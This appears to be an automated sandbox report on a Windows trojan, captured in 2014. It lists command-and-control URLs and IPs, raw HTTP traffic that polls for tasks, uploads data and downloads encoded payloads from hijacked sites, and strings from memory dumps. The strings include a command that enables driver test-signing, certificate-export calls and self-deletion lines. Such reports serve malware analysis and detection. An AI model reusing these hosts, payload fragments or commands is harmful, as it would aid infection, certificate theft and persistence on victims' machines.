hxxp://95.211.192.195/tasks?version=106&group=0227&client=2fe8d181fcecd35bfe45e0bf12491463&computer=VIRUS1&os=5.1&latency=0.0 | |
hxxp://ds-any-fp3-real.wa1.b.yahoo.com/ | |
hxxp://95.211.192.195/data?version=1006&group=0227&client=2fe8d181fcecd35bfe45e0bf12491463&computer=VIRUS1&os=5.1&latency=0.0&type=8 | |
newdirex.com | 173.220.29.2 |
www.yahoo.com | 46.228.47.115 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /tasks?version=106&group=0227&client=2fe8d181fcecd35bfe45e0bf12491463&computer=VIRUS1&os=5.1&latency=0.0 HTTP/1.1
User-Agent: Microsoft-CryptoAPI/6.1
Host: 95.211.192.195
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 14 Mar 2014 13:33:25 GMT
Content-Length: 0
Connection: keep-alive
POST /data?version=1006&group=0227&client=2fe8d181fcecd35bfe45e0bf12491463&computer=VIRUS1&os=5.1&latency=0.0&type=8 HTTP/1.1
User-Agent: Microsoft-CryptoAPI/6.1
Host: 95.211.192.195
Content-Length: 8005
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Mar 2014 13:34:08 GMT
Content-Type: text/xml; charset="UTF-8"
Content-Length: 0
Connection: keep-alive
Content-Encoding: UTF-8
GET /header/27UKp.fb2 HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: newdirex.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 14 Mar 2014 13:35:09 GMT
Server: Apache
Last-Modified: Thu, 27 Feb 2014 12:03:27 GMT
Accept-Ranges: bytes
Content-Length: 469739
Connection: close
Content-Type: text/plain
ZZP......<..J..{N.'....AJ.:.J...S...F......MCa6AJ.[4k...9.7.8.p. ...).y.%.7.(.7.?.7.J.7...7.%,s.d...n.....o..j.....5..uCH...(.......M..G....i.u.[..@(.......J.E.)..._.G.....K..(B...O...I...K...8..]J.......Z,...,..J...H.'.O..{E)......J6.yC..xH..x_*..I.......b.-.J...{......4...a].c1/.cyI.fy.._.....B.7.J.9.8.v. ..C....fl..........d/.............7Cl9.9.e.........J.h6Y.U.J...J...JE.r....J'C.F...n.. >....&S.B(..?.....P...*a....>........'...V..{[.zJM..F..qM..>K/..?Z.r.m..Im..H..../...E..>..RJ...N...N...................['k.Z(..J...K(......j..sM/..K...](..b.......^_I...$9...??..t4S..H(..>.V.H...Z...I........m..>s.R...9L&...,.q...yKo.>....k...BGyt.%.o.Sv..[...,c....8K,..w....L...S.....).\..yn.8N........'V.J...j..Pj...D...JSc..a..3S......J....G.t3&.yF.s.W&..F...,$.yl...bG.p....G'.T....OH..j.#.l.0...............q.KjP.h....o..Jk..f=....7......@Ar.k..........B...M...j%N..jI......lb..]..*....%.z....J..{.....lc....nC/...o......Y..Y..UG..b...U. ..t.PGr.k.............xB.......q-......H.w."...Y!.......D........@........r7..8J'......B.,.E....-..h.....@..K...J....Hi?......>....j....U..c..\....^....k.xI/..J..z...1..3|>.....Ct:l.i...9K<=}....Jxw.i}.sL$.s........Hl.q...z...>...H....J..[N.w../....._N<t...v.^.zYI$~..l.S....*.#.J.'.`.'.V...{.Sw.H...Hg....S....:...J\g..\g.....:...J...JPg..!.t..%....,ZSV.`.'....a[.R...H0.<......U...@...Z..t>.......~.3.R.......MP..;.. ...YJ...SF..S.&.J...Hm....W.~...z.....4(...z.B...~.K....~..NPB.....aH<o.....QB.z......A..S.....S...9z...J|'.`t'.......Sw....V...
<<
<<< skipped >>>
GET / HTTP/1.1
Host: VVV.yahoo.com
HTTP/1.1 301 Redirect
Date: Fri, 14 Mar 2014 13:35:14 GMT
Connection: close
Via: HTTP/1.1 ir7.fp.ir2.yahoo.com (YahooTrafficServer/1.20.13 [c s f ])
Server: YTS/1.20.13
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Location: hXXps://VVV.yahoo.com/
Content-Length: 212
<HEAD><TITLE>Redirect</TITLE></HEAD>.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetica,Arial"><B>. "<em>hXXps://VVV.yahoo.com/</em>".<p></B></FONT>..<!-- default "Redirect" response (301) -->.</BODY>....
GET /wp-content/uploads/2014/02/Test.fb2 HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: elwoodcinemas.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 14 Mar 2014 13:35:06 GMT
Server: Apache
Last-Modified: Thu, 27 Feb 2014 12:02:10 GMT
Accept-Ranges: bytes
Content-Length: 256674
Connection: close
Content-Type: text/plain
ZZP.J....<..J..{N.'....AJ.:.J...S...F......MCa6AJ.[4k...9.7.8.p. ...).y.%.7.(.7.?.7.J.7...7.%,s.d...n......S.r.......Y..J.h..\..H........m.....{.P......J...N..&.UE.)...A.............4.O...J...K..mJ..../.3.,..Z..x.,.xO..vH......iO....R..E...^-..I...J..DN. .N...Jl.....y....].9./.cyIX).J.......I.7.J.w.8.v. t.....8t...A.....9zC.K.J.=)..Q9K.....g.9.t9Hn-9v......6Y.W.J...J.(.y.Br./..JSb.......7...?.KSb.JSb.....?...?...........J/..J,j.J..r.,.z ..0...c........O...H.............x|..c..Sc.NS..K........o..eAv.?...F.R../...D......8q..JD..I.v.....J.".B,..O,...5.../..Fo.....y>............... .N..[W...F.J.GyJD.'....?.A.........J..G...r..[9J.,>...rL).9>.....,.j..zw.......Q.6......... .}. ..._...Pl.x\....L..h...K...I...H.............N.g.F..D5.I...Z)..D.=._.7......,..J..MC.....j..fD.s....t|"F/..F.......Jl......B...?..8.....,.....|.w...E.....y..b....9_.W.....E(..J...*%Z...Z...wr..7z...|Kk..h......XJ}......n....'i.....J.R;I.......X..*6N...'..w"W|..s.C..../W...*.....K-..........K.*j......9..I.{....w#...M..w>..K....MU.......Np4...M-........Np...1..w..e.5K.w...R.......R....z..e..'.... .K..rDG.r.'i.Z!..qda.K%..F....T...'...R....I..l7.F.....h.@.w.....}...J'Q.qkd...Q...../U...)..#/i.J.e..........%i..T..8,Y.....B..?I.......K(.r..DtV.(.......0.....M...M.......Kn .......$"..6t...sB.-2?U.r?.<;.T..L'G...%.J'[.j)..S.h..ec.qo..E.......ac.:......$9....H..p.T7.M'.rH.......N...z.b...'.v....d........WkK..8j(..@......Hg.'..N.iJ.....~..T.......Xa....r../s..'...3zr.7.Q'V.:.i.JS.r......O.....E..;........E.......E..X..R..|.zN|.X@lhR6.
<<
<<< skipped >>>
GET / HTTP/1.1
Host: VVV.yahoo.com
HTTP/1.1 301 Redirect
Date: Fri, 14 Mar 2014 13:35:21 GMT
Connection: close
Via: HTTP/1.1 ir10.fp.ch1.yahoo.com (YahooTrafficServer/1.20.13 [c s f ])
Server: YTS/1.20.13
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Location: hXXps://VVV.yahoo.com/
Content-Length: 212
<HEAD><TITLE>Redirect</TITLE></HEAD>.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetica,Arial"><B>. "<em>hXXps://VVV.yahoo.com/</em>".<p></B></FONT>..<!-- default "Redirect" response (301) -->.</BODY>....
Map
Strings from Dumps
osuf.exe_604_rwx_010C0000_00006000:
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
\\.\NtSecureSys
ntdll.dll
svchost.exe
EUDC\%d
KeDelayExecutionThread
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegFlushKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
msvcrt.dll
osuf.exe_604_rwx_010D0000_00001000:
.text
`.data
.idata
@.reloc
PSSSSSSh
osuf.exe_604_rwx_01134000_00003000:
zcÁ
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{6D2DABD3-6C4A-40B1-20F5-810C00E3A21E}
osuf.exe_604_rwx_01750000_0006D000:
.text
`.data
.idata
@.reloc
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
\\.\NtSecureSys
ntdll.dll
svchost.exe
EUDC\%d
KeDelayExecutionThread
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegFlushKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
msvcrt.dll
Invalid parameter passed to C runtime function.
=65!c
8=6(0?5 &
svp%uec
{zfnmt==.eno
0123456789
`82uURL
`8.sC
G%c_|
.Oex=
".xF=
.Ol (
cxa6.xb
X?(xg.TD
x.Na<\}
xKx.QW
!^!<!>
http://www.google.com/
http://www.bing.com/
HTTP/1.1
REPORT
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
RegDeleteKeyExW
gdiplus.dll
GdiplusShutdown
t.Ht$HHt
w%fkN
L$Â$
m9.td
zcÁ
GetKeyboardState
MsgWaitForMultipleObjects
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
PathIsURLW
UrlUnescapeA
SHLWAPI.dll
ShellExecuteW
Secur32.dll
ole32.dll
WS2_32.dll
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXImportCertStore
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
3'393 7%7
4&4-41484
7#7'7 7/737
8‚8C8O8_8k8s8{8
4%5x5<6
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
urlmon.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
"%s" %s
/c "%s"
Wadvapi32.dll
kernel32.dll
shell32.dll
\StringFileInfo\xx\%s
cabinet.dll
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{6D2DABD3-6C4A-40B1-20F5-810C00E3A21E}
Explorer.EXE_1212_rwx_02020000_0006D000:
.text
`.data
.idata
@.reloc
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
\\.\NtSecureSys
ntdll.dll
svchost.exe
EUDC\%d
KeDelayExecutionThread
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegFlushKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
msvcrt.dll
Invalid parameter passed to C runtime function.
=65!c
8=6(0?5 &
svp%uec
{zfnmt==.eno
0123456789
`82uURL
`8.sC
G%c_|
.Oex=
".xF=
.Ol (
cxa6.xb
X?(xg.TD
x.Na<\}
xKx.QW
!^!<!>
http://www.google.com/
http://www.bing.com/
HTTP/1.1
REPORT
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
RegDeleteKeyExW
gdiplus.dll
GdiplusShutdown
t.Ht$HHt
w%fkN
L$Â$
m9.td
zcÁ
GetKeyboardState
MsgWaitForMultipleObjects
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
PathIsURLW
UrlUnescapeA
SHLWAPI.dll
ShellExecuteW
Secur32.dll
ole32.dll
WS2_32.dll
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXImportCertStore
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
3'393 7%7
4&4-41484
7#7'7 7/737
8‚8C8O8_8k8s8{8
4%5x5<6
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
urlmon.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
"%s" %s
/c "%s"
Wadvapi32.dll
kernel32.dll
shell32.dll
\StringFileInfo\xx\%s
cabinet.dll
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{6D2DABD3-6C4A-40B1-20F5-810C00E3A21E}